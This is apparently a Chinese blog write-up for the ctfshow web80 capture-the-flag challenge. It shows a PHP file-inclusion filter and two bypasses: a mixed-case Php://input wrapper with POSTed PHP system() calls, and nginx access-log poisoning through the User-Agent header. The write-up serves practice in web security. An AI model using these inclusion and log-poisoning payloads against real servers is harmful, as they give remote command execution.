[ctfshow web入门] web80

一口一个橘子2025-05-31 16:46

信息收集

过滤了phpdata

php 复制代码 
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

解题

大小写绕过

data不知道为什么不成功,有知道的大佬也可以在评论区教我一手

s 复制代码 
?file=Php://input
post:
<?php system('ls'); ?>
<?php system('tac fl0g.php'); ?>

hackbar记得使用raw模式,basic模式下服务器无法收到任何post数据

日志绕过

php 复制代码 
?file=/var/log/nginx/access.log

user-agent里写上

php 复制代码 
<?php system('ls'); ?>
<?php system('tac fl0g.php'); ?>

web79    目录    web81

相关推荐
木子雨廷17 分钟前
Flutter 开发一个plugin
前端·flutter
重生之我是一名前端程序员20 分钟前
websocket + xterm 前端实现网页版终端
前端·websocket
sorryhc21 分钟前
【AI解读源码系列】ant design mobile——Space间距
前端·javascript·react.js
uhakadotcom36 分钟前
NPM与NPX的区别是什么?
前端·面试·github
GAMC1 小时前
如何修改node_modules的组件不被install替换?可以使用patch-package
前端
页面仔Dony1 小时前
webpack 与 Vite 深度对比
前端·前端工程化
Juchecar1 小时前
Vue3 组件生命周期详解
前端·vue.js
页面仔Dony1 小时前
打包工具配置base、publicPath字段的作用和区别
前端·前端工程化
gongzemin1 小时前
前端下载xlsx 提示试图打开文件时遇到错误
前端
我是ed1 小时前
# JS获取用户访问网页的浏览器、IP、地址等信息 实现访问统计
前端
热门推荐
01UV安装并设置国内源02KGG转MP3工具|非KGM文件|解密音频03Cursor 快速入门指南:从安装到核心功能04【2025.08.06最新版】Android Studio下载、安装及配置记录(自动下载sdk)05【踩坑笔记】50系显卡适配的 PyTorch 安装06Claude Code VSCode集成开发指南:AI编程助手完整配置0720个国内外主流AI绘画工具大汇总(最新免费可用~)08蜘蛛磁力 搜索引擎大全,如何使用蜘蛛磁力查找磁力链接09UnityHub Validation Failed下载编辑器错误,添加模块报错的解决方案10突破百度网盘的下载限速,两种方法教会你【超详细】